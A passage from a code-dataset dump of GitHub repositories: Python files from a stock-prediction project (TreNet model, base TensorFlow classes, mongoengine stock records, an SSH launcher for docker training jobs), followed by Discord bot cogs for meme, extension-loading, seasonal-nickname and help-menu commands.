["T9999"] market = args.market # market = 'future' episode = args.episode # episode = 2000 # training_data_ratio = 0.5 training_data_ratio = args.training_data_ratio model_name = os.path.basename(__file__).split('.')[0] env = Market(codes, start_date="2012-01-01", end_date="2019-07-19", **{ "market": market, # "use_sequence": True, "logger": generate_market_logger(model_name), "training_data_ratio": training_data_ratio, }) algorithm = Algorithm(tf.Session(config=config), env, env.trader.action_space, env.data_dim, **{ "mode": mode, "episodes": episode, "enable_saver": True, "learning_rate": 0.003, "enable_summary_writer": True, "logger": generate_algorithm_logger(model_name), "save_path": os.path.join(CHECKPOINTS_DIR, "RL", model_name, market, "model"), "summary_path": os.path.join(CHECKPOINTS_DIR, "RL", model_name, market, "summary"), }) algorithm.run() algorithm.eval() algorithm.plot() if __name__ == '__main__': main(model_launcher_parser.parse_args()) ``` #### File: algorithm/SL/TreNet.py ```python import tensorflow as tf import logging import os from algorithm import config from base.env.market import Market from checkpoints import CHECKPOINTS_DIR from base.algorithm.model import BaseSLTFModel from sklearn.preprocessing import MinMaxScaler from helper.args_parser import model_launcher_parser class Algorithm(BaseSLTFModel): def __init__(self, session, env, seq_length, x_space, y_space, **options): super(Algorithm, self).__init__(session, env, **options) # # # 形状:(len(dates),5,3*特征dim),三维数组 self.seq_length, self.x_space, self.y_space = seq_length, x_space, y_space # x_space = env.data_dim, y_space = env.code_count try: self.hidden_size = options['hidden_size'] except KeyError: self.hidden_size = 1 # 下方所有方法在 class Algorithm 初始化的时候已经实例化 self._init_input() self._init_nn() self._init_op() self._init_saver() self._init_summary_writer() # 构建类的时候已经初始化了 def _init_input(self): self.rnn_x = tf.placeholder(tf.float32, [None, self.seq_length, self.x_space]) # 形状为(?,5,20) x_space = env.data_dim, y_space = env.code_count self.cnn_x = tf.placeholder(tf.float32, [None, self.seq_length, self.x_space, 1]) # 形状为(?, 5,20,1) x_space = env.data_dim, y_space = env.code_count. 这里的1是指的是输入通道数, 股票数据为1个通道 self.label = tf.placeholder(tf.float32, [None, self.y_space]) # 形状为(?, 4) # 构建类的时候已经初始化了 def _init_nn(self): # self.add_rnn由传入的参数BaseSLTFModel的父类BaseTFModel下的静态方法 @staticmethod def add_rnn()所初始化,返回cells,这里是BasioLSTMCell序列 # def add_rnn(layer_count, hidden_size, cell=rnn.BasicLSTMCell, activation=tf.tanh): # return rnn.MultiRNNCell(cells) self.rnn = self.add_rnn(1, self.hidden_size) # 返回LSTMCell , "hidden_size": 5 self.rnn_output, c_t_and_h_t = tf.nn.dynamic_rnn(self.rnn, self.rnn_x, dtype=tf.float32) # rnn_output的形状为(?,5,5) self.rnn_output = self.rnn_output[:, -1] #rnn_output形状变为(?,5) # self.cnn_x_input is a [-1, 5, 20, 1] tensor, after cnn, the shape will be [-1, 5, 20, 5]. ???????????????????????????应该是[-1, 5, 20, 2]吧 # 为什么是20? 因为作者在做这个项目的时候用了4只股票, 每只股票5个特征值['open', 'high', 'low', 'close', 'volume'], # 同时place_holder 中是这样定义的(None,self.length,self.x_space,1), 也就是说self.x_space = env.data_dim = 20 # 那是因为cnn的输入形状就是这样的! tensor: (batch_size, width, height, channels) # add_cnn 返回一个卷积层叠加最大池化层,最终返回最大池化层 self.cnn = self.add_cnn(self.cnn_x, filters=2, kernel_size=[2, 2], pooling_size=[2, 2]) #这里返回的是一个张量,形状为(?,5,20,2) self.cnn_output = tf.reshape(self.cnn, [-1, self.seq_length * self.x_space * 2]) # 展平除了批量维度以外的所有其他维度, 返回的形状为(?,200) 5*20*2 == 200 ,keras中的实现是model.add(layers.Flatten()),"首先, # 我们需要将3D 输出展平为1D",注意这里是没有用激活函数的,所以用矩阵变形就可以达到目的 # 特征融合层 self.y_concat = tf.concat([self.rnn_output, self.cnn_output], axis=1) #矩阵拼接,特征融合层,返回的形状为(?, 205) # 添加一个dense全连接层,full connected layer self.y_dense = self.add_fc(self.y_concat, 16) # 添加全连接层,返回形状为 (?,16) # # 添加一个dense全连接层 # ######最终获取到self.y self.y = self.add_fc(self.y_dense, self.y_space) #返回形状为(? , 4) 改变y_dense 的最后一维度为y_space # 构建类的时候已经初始化了 # 传入最终输出,其实就是loss_function def _init_op(self): # Algrithm在初始化的时候已经初始化这个方法,继而两个tf.variable_scope也进入内存变量 with tf.variable_scope('loss'): self.loss = tf.losses.mean_squared_error(self.y, self.label) # with tf.variable_scope('train'): self.global_step = tf.Variable(0, trainable=False) self.optimizer = tf.train.AdamOptimizer(self.learning_rate) # learning rate = 0.001 # 在tf.variable_scope('train')数据域下, 执行op,即最小化loss值 self.train_op = self.optimizer.minimize(self.loss) self.session.run(tf.global_variables_initializer()) # 开始训练# train_steps,default=100000 def train(self): for step in range(self.train_steps):# train_steps,default=100000 # batch_x,batch_y分别是第n天到第n+32天、第n+1天到第n+1+32 天的数据;其实,batch_y 也是label标签 batch_x, batch_y = self.env.get_batch_data(self.batch_size) #<class 'tuple'>: (32, 5, 20) # 将batch_x 数据分别赋值给循环网络、卷积网络,注意和def ——init_input() 方法中数据的形状相对应 x_rnn, x_cnn = batch_x, batch_x.reshape((-1, self.seq_length, self.x_space, 1))#(32,5,20),(32,5,20,1) # run session 其中包括执行train_op,两步op,一是让loss实际执行,二十让train_op实际执行 _, loss = self.session.run([self.train_op, self.loss], feed_dict={self.rnn_x: x_rnn, #注意和def ——init_input() 方法中数据的形状相对应 self.cnn_x: x_cnn, #注意和def ——init_input() 方法中数据的形状相对应 self.label: batch_y})#注意和def ——init_input() 方法中数据的形状相对应 if (step + 1) % 1000 == 0: logging.warning("Step: {0} | Loss: {1:.7f}".format(step + 1, loss)) if step > 0 and (step + 1) % self.save_step == 0: if self.enable_saver: self.save(step) # 进入到predict阶段,已经不需要损失函数的参与了 def predict(self, x): return self.session.run(self.y, feed_dict={self.rnn_x: x, self.cnn_x: x.reshape(-1, self.seq_length, self.x_space, 1)}) def main(args): # mode = args.mode mode = "train" # codes = args.codes # codes = ["601398"] codes = ["600036", "601328", "601998", "601398"] # codes = ["AU88", "RB88", "CU88", "AL88"] market = args.market # default="stock" train_steps = args.train_steps # default=100000 training_data_ratio = 0.8 # training_data_ratio = args.training_data_ratio # env为股票市场market, market市场实例化,**可选参数传入 env = Market(codes, start_date="2008-01-01", end_date="2019-07-19", **{ "market": market,## default="stock" "use_sequence": True, "scaler": MinMaxScaler, # sklearn提供的缩放器 "mix_index_state": False,# 表明要混合上证指数,以结合市场趋势做更宏观的预测 "training_data_ratio": training_data_ratio, }) model_name = os.path.basename(__file__).split('.')[0] # 返回“TreNet,即文件名 # 算法初始化,这里是TreNet实例化, 传入一系列**可选参数 algorithm = Algorithm(tf.Session(config=config), env, env.seq_length, env.data_dim, env.code_count, **{ "mode": mode,# test "hidden_size": 5, # 应该是5层hidden layer "enable_saver": True, "train_steps": train_steps,# default=100000 "enable_summary_writer": True, "save_path": os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "model"), "summary_path": os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "summary"), }) algorithm.run() algorithm.eval_and_plot() if __name__ == '__main__': # 传入包含参数的类 model_launcher_parser.parse_args() main(model_launcher_parser.parse_args()) ``` #### File: base/algorithm/model.py ```python import tensorflow as tf import numpy as np import json from abc import abstractmethod from helper import data_ploter from tensorflow.contrib import rnn from helper.data_logger import generate_algorithm_logger #base model 定义了最通用的方法如添加卷积层,添加循环层 class BaseTFModel(object): def __init__(self, session, env, **options): self.session = session self.env = env self.total_step = 0 try: self.learning_rate = options['learning_rate'] except KeyError: self.learning_rate = 0.001 try: self.batch_size = options['batch_size'] except KeyError: self.batch_size = 32 try: self.logger = options['logger'] except KeyError: self.logger = generate_algorithm_logger('model') try: self.enable_saver = options["enable_saver"] except KeyError: self.enable_saver = False try: self.enable_summary_writer = options['enable_summary_writer'] except KeyError: self.enable_summary_writer = False try: self.save_path = options["save_path"] # lstm中,在Algorithm的初始化的时候传入了"save_path":os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "model" except KeyError: self.save_path = None try: self.summary_path = options["summary_path"] except KeyError: self.summary_path = None try: self.mode = options['mode'] except KeyError: self.mode = 'train' def restore(self): self.saver.restore(self.session, self.save_path) def _init_saver(self): if self.enable_saver: self.saver = tf.train.Saver() def _init_summary_writer(self): if self.enable_summary_writer: self.merged_summary_op = tf.summary.merge_all() self.summary_writer = tf.summary.FileWriter(self.summary_path, self.session.graph) @abstractmethod def _init_input(self, *args): pass @abstractmethod def _init_nn(self, *args): pass @abstractmethod def _init_op(self): pass @abstractmethod def train(self): pass @abstractmethod def predict(self, a): return None, None, None @abstractmethod def run(self): pass # 静态方法,添加一个循环神经网络(这里都是LSTM神经元) @staticmethod def add_rnn(layer_count, hidden_size, cell=rnn.BasicLSTMCell, activation=tf.tanh): # hidden_size = 5,神经元序列 cells = [cell(hidden_size, activation=activation) for _ in range(layer_count)] return rnn.MultiRNNCell(cells) # 静态方法, 添加一个卷积层和池化层, 返回池化层 @staticmethod def add_cnn(x_input, filters, kernel_size, pooling_size): #Tensor("Placeholder_1:0", shape=(?, 5, 20, 1), dtype=float32) convoluted_tensor = tf.layers.conv2d(x_input, filters, kernel_size, padding='SAME', activation=tf.nn.relu) #Tensor("conv2d/Relu:0", shape=(?, 5, 20, 2), dtype=float32) tensor_after_pooling = tf.layers.max_pooling2d(convoluted_tensor, pooling_size, strides=[1, 1], padding='SAME') #Tensor("max_pooling2d/MaxPool:0", shape=(?, 5, 20, 2), dtype=float32) return tensor_after_pooling # 静态方法, 添加一个dense全连接层 @staticmethod def add_fc(x, units, activation=None): return tf.layers.dense(x, units, activation=activation) # 第二级model,base RL增强学习, 传入第一级的baseTFModel类 class BaseRLTFModel(BaseTFModel): #本类初始化 def __init__(self, session, env, a_space, s_space, **options): # 父类初始化 super(BaseRLTFModel, self).__init__(session, env, **options) # Initialize evn parameters. self.a_space, self.s_space = a_space, s_space try: self.episodes = options['episodes'] except KeyError: self.episodes = 30 try: self.gamma = options['gamma'] except KeyError: self.gamma = 0.9 try: self.tau = options['tau'] except KeyError: self.tau = 0.01 try: self.epsilon = options['epsilon'] except KeyError: self.epsilon = 0.9 try: self.buffer_size = options['buffer_size'] except KeyError: self.buffer_size = 10000 try: self.save_episode = options["save_episode"] except KeyError: self.save_episode = 10 # 取值 def eval(self): self.mode = 'test' s = self.env.reset('eval') while True: # 前向传播 c, a, _ = self.predict(s) # s为输入数据, c, a, _ # 前向传播 s_next, r, status, info = self.env.forward(c, a) s = s_next if status == self.env.Done: self.env.trader.log_asset(0) break def plot(self): with open(self.save_path + '_history_profits.json', mode='w') as fp: json.dump(self.env.trader.history_profits, fp, indent=True) with open(self.save_path + '_baseline_profits.json', mode='w') as fp: json.dump(self.env.trader.history_baselines, fp, indent=True) data_ploter.plot_profits_series( self.env.trader.history_baselines, self.env.trader.history_profits, self.save_path ) # 定义checkpoint保存模型参数 def save(self, episode): self.saver.save(self.session, self.save_path) self.logger.warning("Episode: {} | Saver reach checkpoint.".format(episode)) # 保存交易 @abstractmethod def save_transition(self, s, a, r, s_next): pass # 抽象方法,log损失 @abstractmethod def log_loss(self, episode): pass # 获取切片片段,如果a大于三分之一,取2,否则如果a小于负三分之一,取3,否则取0,最后结果转换成float32,转换成list @staticmethod def get_a_indices(a): a = np.where(a > 1 / 3, 2, np.where(a < - 1 / 3, 1, 0)).astype(np.int32)[0].tolist() return a def get_stock_code_and_action(self, a, use_greedy=False, use_prob=False): # Reshape a. if not use_greedy: a = a.reshape((-1,)) # Calculate action index depends on prob. if use_prob: # Generate indices. a_indices = np.arange(a.shape[0]) # Get action index. action_index = np.random.choice(a_indices, p=a) else: # Get action index. action_index = np.argmax(a) else: if use_prob: # Calculate action index if np.random.uniform() < self.epsilon: action_index = np.floor(a).astype(int) else: action_index = np.random.randint(0, self.a_space) else: # Calculate action index action_index = np.floor(a).astype(int) # Get action action = action_index % 3 # Get stock index stock_index = np.floor(action_index / 3).astype(np.int) # Get stock code. stock_code = self.env.codes[stock_index] return stock_code, action, action_index # 并列第二级,监督学习层, 用baseTFModel传入,增加了一些特有的一些全局变量和方法 class BaseSLTFModel(BaseTFModel): def __init__(self, session, env, **options): super(BaseSLTFModel, self).__init__(session, env, **options) # Initialize parameters. self.x, self.label, self.y, self.loss = None, None, None, None try: self.train_steps = options["train_steps"] except KeyError: self.train_steps = 30000 try: self.save_step = options["save_step"] except KeyError: self.save_step = 1000 #如果是训练模式,train,则训练,否则读取训练好的参数 def run(self): if self.mode == 'train': self.train() else: self.restore() def save(self, step): self.saver.save(self.session, self.save_path) self.logger.warning("Step: {} | Saver reach checkpoint.".format(step + 1)) def eval_and_plot(self): x, label = self.env.get_test_data() # x的形状为(561,5,25), label的形状为(561,5) ; 分别返回整个测试集的所有输入序列 和 整个测试集的输出序列,对应着每个输入序列后一天的close y = self.predict(x) #形状为(561,5) , 0.2*总数据=561 with open(self.save_path + '_y.json', mode='w') as fp: json.dump(y.tolist(), fp, indent=True) #保存为model_y.json 在checkpoints\SL\stock\model_y.json 保存着预测值y with open(self.save_path + '_label.json', mode='w') as fp: json.dump(label.tolist(), fp, indent=True) # #保存为model_label.json 在checkpoints\SL\stock\model_label.json 保存着测试集的真实的标签值 data_ploter.plot_stock_series(self.env.codes, # env.codes == <class 'list'>: ['600036', '601328', '601998', '601398'] y, # 形状为(561,5) label, # label的形状为(561,5) self.save_path) # 保存着和单独运行plot_prices.py一样的结果的图片 class BasePTModel(object): def __init__(self, env, **options): self.env = env try: self.learning_rate = options['learning_rate'] except KeyError: self.learning_rate = 0.001 try: self.batch_size = options['batch_size'] except KeyError: self.batch_size = 32 try: self.save_path = options["save_path"] except KeyError: self.save_path = None try: self.mode = options['mode'] except KeyError: self.mode = 'train' @abstractmethod def train(self): pass @abstractmethod def predict(self, a): pass @abstractmethod def restore(self): pass @abstractmethod def run(self): pass class BaseRLPTModel(BasePTModel): def __init__(self, env, a_space, s_space, **options): super(BaseRLPTModel, self).__init__(env, **options) self.env = env self.a_space, self.s_space = a_space, s_space try: self.episodes = options['episodes'] except KeyError: self.episodes = 30 try: self.gamma = options['gamma'] except KeyError: self.gamma = 0.9 try: self.tau = options['tau'] except KeyError: self.tau = 0.01 try: self.buffer_size = options['buffer_size'] except KeyError: self.buffer_size = 2000 try: self.mode = options['mode'] except KeyError: self.mode = 'train' @abstractmethod def _init_input(self, *args): pass @abstractmethod def _init_nn(self, *args): pass @abstractmethod def _init_op(self): pass @abstractmethod def save_transition(self, s, a, r, s_n): pass @abstractmethod def log_loss(self, episode): pass @staticmethod def get_a_indices(a): a = np.where(a > 1 / 3, 2, np.where(a < - 1 / 3, 1, 0)).astype(np.int32)[0].tolist() return a ``` #### File: base/model/document.py ```python from mongoengine import Document from mongoengine import StringField, FloatField, DateTimeField class Stock(Document): #类名即集合名 # 股票代码 code = StringField(required=True) #列名 # 交易日 date = DateTimeField(required=True) # 开盘价 open = FloatField() # 最高价 high = FloatField() # 最低价 low = FloatField() # 收盘价 close = FloatField() # 成交量 volume = FloatField() # 成交金额 amount = FloatField() # 涨跌幅 p_change = FloatField() # 价格变动 price_change = FloatField() # 5日均价 ma5 = FloatField() # 10日均量 ma10 = FloatField() # 20日均量 ma20 = FloatField() # 5日均量 v_ma5 = FloatField() # 10日均量 v_ma10 = FloatField() # 20日均量 v_ma20 = FloatField() # 换手率 turnover = FloatField() meta = { # 索引,加快查询速度, indexes是mongoengine 专用的元数据保留词汇,这里建立了两个索引code和date 'indexes': [ 'code', 'date', ('code', 'date') ] } def save_if_need(self): return self.save() if len(self.__class__.objects(code=self.code, date=self.date)) < 1 else None # 随时准备更新数据至最新 def to_state(self): stock_dic = self.to_mongo() #查询结果转换为字典 stock_dic.pop('_id') stock_dic.pop('code') #pop() 字典方法,删除键对应的值 stock_dic.pop('date') return stock_dic.values() #返回剩下键的值得字典列表集合 def to_dic(self): stock_dic = self.to_mongo() #查询结果转换为字典 stock_dic.pop('_id') # 删除_id 列 return stock_dic.values() #返回剩下键的值的字典列表集合 @classmethod def get_k_data(cls, code, start, end): return cls.objects(code=code, date__gte=start, date__lte=end).order_by('date') #date__gte = start pymongo,date__lte=end 提供的查询的格式, 条件时: date列大于start日期,小于end列, order_by(date) 升序 @classmethod def exist_in_db(cls, code): return True if cls.objects(code=code)[:1].count() else False class Future(Document): # 合约代码 code = StringField(required=True) # 交易日 date = DateTimeField(required=True) # 开盘价 open = FloatField() # 最高价 high = FloatField() # 最低价 low = FloatField() # 收盘价 close = FloatField() # 成交量 volume = FloatField() meta = { 'indexes': [ 'code', 'date', ('code', 'date') ] } def save_if_need(self): return self.save() if len(self.__class__.objects(code=self.code, date=self.date)) < 1 else None def to_state(self): stock_dic = self.to_mongo() stock_dic.pop('_id') stock_dic.pop('code') stock_dic.pop('date') return stock_dic.values() def to_dic(self): stock_dic = self.to_mongo() stock_dic.pop('_id') return stock_dic.values() @classmethod def get_k_data(cls, code, start, end): return cls.objects(code=code, date__gte=start, date__lte=end).order_by('date') @classmethod def exist_in_db(cls, code): return True if cls.objects(code=code)[:1].count() else False ``` #### File: Personae-master-01/script/model_launcher.py ```python import paramiko import sys from helper.args_parser import stock_codes, future_codes def launch_model(): # Model Name. model_name = 'PolicyGradient' # Market Type. market = 'stock' # Codes. codes = stock_codes # Start date. start = "2008-01-01" # End date. end = "2019-07-19" # Episodes. episode = 500 # Train steps. train_steps = 100000 # Training data ratio. training_data_ratio = 0.8 # Mounted dir. mounted_dir = '/home/duser/shuyu/Personae:/app/Personae/' image_name = 'ceruleanwang/personae' rl_cmd = 'docker run -tv {} --network=quant {} algorithm/RL/'.format(mounted_dir, image_name) rl_cmd += "{}.py -c {} -s {} -e {} --market {} --episode {} --train_steps {} --training_data_ratio {}".format( model_name, " ".join(codes), start, end, market, episode, train_steps, training_data_ratio ) cmd = rl_cmd ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname='192.168.4.199', port=22, username='duser') trans = ssh.get_transport() channel = trans.open_session() channel.get_pty() channel.invoke_shell() std_in, std_out, std_err = ssh.exec_command(cmd) while True: line = std_out.readline() if line: sys.stdout.write(line) else: break ssh.close() if __name__ == '__main__': launch_model() ```
{ "source": "916253/Kurisu-Reswitched", "score": 3 }
#### File: Kurisu-Reswitched/addons/meme.py ```python import discord import random from discord.ext import commands class Meme: """ Meme commands. """ def __init__(self, bot): self.bot = bot print('Addon "{}" loaded'.format(self.__class__.__name__)) @commands.command(pass_context=True, hidden=True, name="bam") async def bam_member(self, ctx, user: discord.Member, *, reason=""): """Bams a user owo""" await self.bot.say("{} is ̶n͢ow b̕&̡.̷ 👍̡".format(self.bot.escape_name(user))) @commands.command(pass_context=True, hidden=True, name="warm") async def warm_member(self, ctx, user: discord.Member, *, reason=""): """Warms a user :3""" await self.bot.say("{} warmed. User is now {}°C.".format(user.mention, str(random.randint(0, 100)))) @commands.command(hidden=True) async def frolics(self): """test""" await self.bot.say("https://www.youtube.com/watch?v=VmarNEsjpDI") def setup(bot): bot.add_cog(Meme(bot)) ```
{ "source": "916253/numberbot", "score": 2 }
#### File: numberbot/cogs/load.py ```python from __future__ import annotations import discord from discord.ext import commands from typing import TYPE_CHECKING from utils.checks import is_staff if TYPE_CHECKING: from kurisu import Kurisu class Load(commands.Cog): """ Load commands. """ def __init__(self, bot: Kurisu): self.bot: Kurisu = bot self.emoji = discord.PartialEmoji.from_str('⌨') async def cog_check(self, ctx: commands.Context): if ctx.guild is None: raise commands.NoPrivateMessage() return True @is_staff("OP") @commands.command(hidden=True) async def load(self, ctx: commands.Context, *, module: str): """Loads a Cog.""" try: if module[0:7] != "cogs.": module = "cogs." + module self.bot.load_extension(module) await ctx.send('✅ Extension loaded.') except Exception as e: await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```') @is_staff("OP") @commands.command(hidden=True) async def unload(self, ctx: commands.Context, *, module: str): """Unloads a Cog.""" try: if module[0:7] != "cogs.": module = "cogs." + module if module == "cogs.load": await ctx.send("❌ I don't think you want to unload that!") else: self.bot.unload_extension(module) await ctx.send('✅ Extension unloaded.') except Exception as e: await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```') @is_staff("OP") @commands.command(name='reload') async def _reload(self, ctx: commands.Context, *, module: str): """Reloads a Cog.""" try: if module[0:7] != "cogs.": module = "cogs." + module self.bot.reload_extension(module) await ctx.send('✅ Extension reloaded.') except Exception as e: await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```') def setup(bot): bot.add_cog(Load(bot)) ``` #### File: numberbot/cogs/seasonal.py ```python from __future__ import annotations import discord from datetime import datetime from discord.ext import commands from re import compile, finditer, search from typing import List, Union, Optional, TYPE_CHECKING if TYPE_CHECKING: from kurisu import Kurisu class Season: def __init__(self, start: str, end: str, emote: str, emote_str: str): self.start_str = start self.end_str = end self.start = Season.get_int_from_dotstr(start) self.end = Season.get_int_from_dotstr(end) self.emote = emote self.emote_str = emote_str self.emote_regex = compile(emote) def __contains__(self, time: Union[str, int]) -> bool: if isinstance(time, str): time = Season.get_int_from_dotstr(time) # handle wrapping around year boundaries if self.start > self.end: return time <= self.end or time >= self.start else: return self.start <= time <= self.end def __eq__(self, other: str) -> bool: return other in (self.emote_str, self.emote) @staticmethod def get_int_from_dotstr(dotstr: str) -> int: month, day = dotstr.split(".") return (int(month) * 31) + int(day) class Seasonal(commands.Cog): """ Seasonal commands. """ seasons: List[Season] = [ Season("12.1", "12.31", "🎄", "xmasthing"), Season("6.1", "6.31", "🌈", "rainbow"), Season("10.1", "10.31", "🎃", "pumpkin"), Season("11.1", "11.30", "🦃", "turkey"), Season("12.31", "1.1", "🎆", "fireworks"), Season("3.16", "3.17", "🍀", "shamrock"), ] def __init__(self, bot: Kurisu): self.bot: Kurisu = bot self.emoji = discord.PartialEmoji.from_str('\u2600\ufe0f') async def _seasonal_impl(self, ctx: commands.Context, mode: str, target: Optional[str] = None): t = datetime.today() curr_time = f"{t.month}.{t.day}" for season_ in self.seasons: if (mode == "remove" and season_.emote_str == target) or (target is None and curr_time in season_): season = season_ break else: if target is None or mode == "add": return await ctx.send( "There is no special season happening right now " "or it hasn't been implemented yet." ) return await ctx.send( "There is no season with the name you specified." ) new_nick = "" if mode == "add": if target is not None: return await ctx.send( "💢 You can't choose which season to add! " "(Try again with just .seasonal)" ) new_nick = f"{ctx.author.display_name} {season.emote}" if ctx.author.display_name[-1] == season.emote: return await ctx.send( f"Your shown name already ends in a {season.emote}!" ) if len(new_nick) > 32: return await ctx.send( "💢 Your name is too long! " f"(max is 32 characters, yours would be {len(new_nick)})") elif mode == "remove": if ctx.author.nick: matches = list(finditer(season.emote_regex, ctx.author.nick)) if not matches: return await ctx.send( "Your nickname doesn't contain the current/requested" f" seasonal emote [{season.emote} | '{season.emote_str}']" ) res = matches[-1] new_nick = ( f"{ctx.author.display_name[:res.start()]}" f"{ctx.author.display_name[res.end():]}" ) if len(new_nick) == 0: return await ctx.send("💢 I can't completely remove your nick!") elif bool(search(season.emote_regex, ctx.author.name)): return await ctx.send(f"Your username is the one with a {season.emote_str}") else: return await ctx.send(f"You don't have a {season.emote_str}") try: await ctx.author.edit(nick=new_nick) await ctx.send(f"Your nickname is now `{ctx.author.display_name}`") except discord.errors.Forbidden: await ctx.send("💢 I can't change your nickname! (Permission Error)") @commands.guild_only() @commands.command() async def seasonal(self, ctx: commands.Context): """Adds the emote of the current season to your name. You can see which seasons exist and when they are by typing .seasonals """ return await self._seasonal_impl(ctx, "add") @commands.guild_only() @commands.command() async def noseasonal(self, ctx: commands.Context, *, target: Optional[str]): """Removes the emote of the current season (or any you want) from your name. You can see which seasons exist and when they are by typing .seasonals """ return await self._seasonal_impl(ctx, "remove", target) @commands.command(aliases=["seasons"]) async def seasonals(self, ctx: commands.Context): """Lists all available seasons.""" line_template = "{0:6} | {1:6} | {2:1} | {3}\n" await ctx.send( "The following seasons exist on this server:\n```" + line_template.format("start", "end", "emote", "emote_name") + f"{'=' * 36}\n" + "".join( line_template.format( season.start_str, season.end_str, season.emote, season.emote_str ) for season in self.seasons ) + "```" ) def setup(bot): bot.add_cog(Seasonal(bot)) ``` #### File: numberbot/utils/help.py ```python import discord import math from discord.ui import Select from discord.ext import commands from itertools import islice from typing import Union SELECT_MAX_VALUES = 25 class BasePaginator: """Serves as base paginator for the HelpView""" def __init__(self, n_pages): self.n_pages = n_pages self.idx = 0 self.pages: dict[int, discord.Embed] = {} def previous(self): self.idx = max(self.idx - 1, 0) def next(self): self.idx = min(self.idx + 1, self.n_pages - 1) def first(self): self.idx = 0 def last(self): self.idx = self.n_pages - 1 def is_first(self): return self.idx == 0 def is_last(self): return self.idx == self.n_pages - 1 class CogHelpPaginator(BasePaginator): commands_per_page = 8 def __init__(self, cog: Union[commands.Cog, commands.Group], commands: list[commands.Command], prefix: str): super().__init__(n_pages=math.ceil(len(commands) / self.commands_per_page)) self.cog = cog self.commands = commands self.prefix = prefix def current(self) -> discord.Embed: if embed := self.pages.get(self.idx): return embed else: index = self.idx * self.commands_per_page embed = self.create_embed(commands=self.commands[index:index + self.commands_per_page]) self.pages[self.idx] = embed return embed def create_embed(self, commands: list[commands.Command]) -> discord.Embed: embed = discord.Embed(title=f"{self.cog.qualified_name} commands", description=self.cog.description, colour=discord.Colour(0xb01ec3)) if self.n_pages > 1: embed.title += f" [{self.idx + 1}/{self.n_pages}]" for command in commands: # All commands should have a help doc but just in case someone adds one without it. embed.add_field(name=f"{command.qualified_name} {command.signature}", value=command.short_doc or "No help for you.", inline=False) embed.set_footer(text=f'Use {self.prefix}help [command] for more info about a command.') return embed class MainHelpPaginator(BasePaginator): categories_per_page = 9 def __init__(self, mapping: dict[commands.Cog, list[commands.Command]], description: str, prefix: str): super().__init__(n_pages=math.ceil(len(mapping) / self.categories_per_page)) self.description = description self.prefix = prefix self.slices = [] it = iter(mapping) # Slice the mapping to mapping 6 cogs each for i in range(0, len(mapping), self.categories_per_page): self.slices.append({k: mapping[k] for k in islice(it, self.categories_per_page)}) def current(self) -> discord.Embed: if embed := self.pages.get(self.idx): return embed else: embed = self.create_embed(mapping=self.slices[self.idx]) self.pages[self.idx] = embed return embed def create_embed(self, mapping: dict[commands.Cog, list[commands.Command]]): embed = discord.Embed(title="Kurisu the bot for Nintendo Homebrew", colour=0xb01ec3) embed.description = f"{self.description}\n\nBelow you will find the categories of commands in Kurisu:" embed.set_footer( text=f"Use {self.prefix}help [category] for more info about a category or select a category below.") if self.n_pages > 1: embed.title += f" [{self.idx + 1}/{self.n_pages}]" for category, cmds in mapping.items(): if not cmds: continue embed.add_field(name=f"**{category.qualified_name}** [{len(cmds)}]", value=category.description) return embed class CommandHelpPaginator(BasePaginator): def __init__(self, command: commands.Command, prefix: str): # Commands have just one page, a paginator is not needed but makes it way easier to integrate with the View super().__init__(n_pages=1) self.description = command.help or "No help for you." self.prefix = prefix self.command = command def current(self) -> discord.Embed: return self.create_embed(command=self.command) def create_embed(self, command: commands.Command): embed = discord.Embed(title=f"{command.name} command", colour=0xb01ec3) embed.description = self.description if command.aliases: embed.add_field(name="Aliases", value=' '.join(command.aliases), inline=False) embed.add_field(name="Usage", value=f"{self.prefix} {command.qualified_name} {command.signature}", inline=False) embed.set_footer(text=f"Category: {command.cog_name if command.cog_name else 'No Category'}") return embed class CategorySelect(Select['HelpView']): def __init__(self, mapping: dict[commands.Cog, list[commands.Command]], ctx: commands.Context): super().__init__(placeholder="Select a Category.") self.ctx = ctx self.mapping = mapping self.populate() def populate(self): self.add_option( label="Kurisu Categories", value="main", description="The index of Kurisu Categories.", emoji=self.ctx.bot.emoji ) for cog, cmds in self.mapping.items(): # We don't need commandless cogs here if not cmds: continue emoji = getattr(cog, 'emoji', None) self.add_option(label=cog.qualified_name, value=cog.qualified_name, description=cog.description, emoji=emoji) async def callback(self, interaction: discord.MessageInteraction): await interaction.response.defer() value = self.values[0] if value == 'main': await self.view.change_paginator( MainHelpPaginator(self.mapping, self.ctx.bot.description, self.ctx.clean_prefix), interaction) else: cog = self.ctx.bot.get_cog(value) commands = self.mapping[cog] await self.view.change_paginator(CogHelpPaginator(cog, commands, self.ctx.clean_prefix), interaction) class CommandSelect(Select['HelpView']): def __init__(self, cog: Union[commands.Cog, commands.Group], commands: list[commands.Command], ctx: commands.Context, suffix: str = ""): super().__init__(placeholder="Select a command" + suffix) self.ctx = ctx self.cog = cog self.commands = commands self.populate() def populate(self): self.add_option( label=f"{self.cog.qualified_name} commands", value="main", description=f"{self.cog.qualified_name} commands.", emoji=self.ctx.bot.emoji ) for command in self.commands: self.add_option(label=command.name, value=command.qualified_name, description=command.description) async def callback(self, interaction: discord.MessageInteraction): await interaction.response.defer() value = self.values[0] if value == 'main': await self.view.change_paginator(CogHelpPaginator(self.cog, self.commands, self.ctx.clean_prefix), interaction) else: command = self.ctx.bot.get_command(value) await self.view.change_paginator(CommandHelpPaginator(command, self.ctx.clean_prefix), interaction) class HelpView(discord.ui.View): def __init__(self, paginator: Union[MainHelpPaginator, CogHelpPaginator, CommandHelpPaginator], author: Union[discord.Member, discord.User]): super().__init__(timeout=30) self.paginator = paginator self.message = None self.author = author if self.paginator.n_pages == 1: self.disable_buttons() async def on_timeout(self) -> None: if self.message: await self.message.edit(view=None) self.stop() async def interaction_check(self, interaction: discord.MessageInteraction) -> bool: if interaction.user.id != self.author.id: await interaction.response.send_message("This view is not for you.", ephemeral=True) return False return True def reset_buttons(self): self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = False self.last_page.disabled = False def disable_buttons(self): self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = True self.last_page.disabled = True async def change_paginator(self, paginator: Union[MainHelpPaginator, CogHelpPaginator, CommandHelpPaginator], interaction: 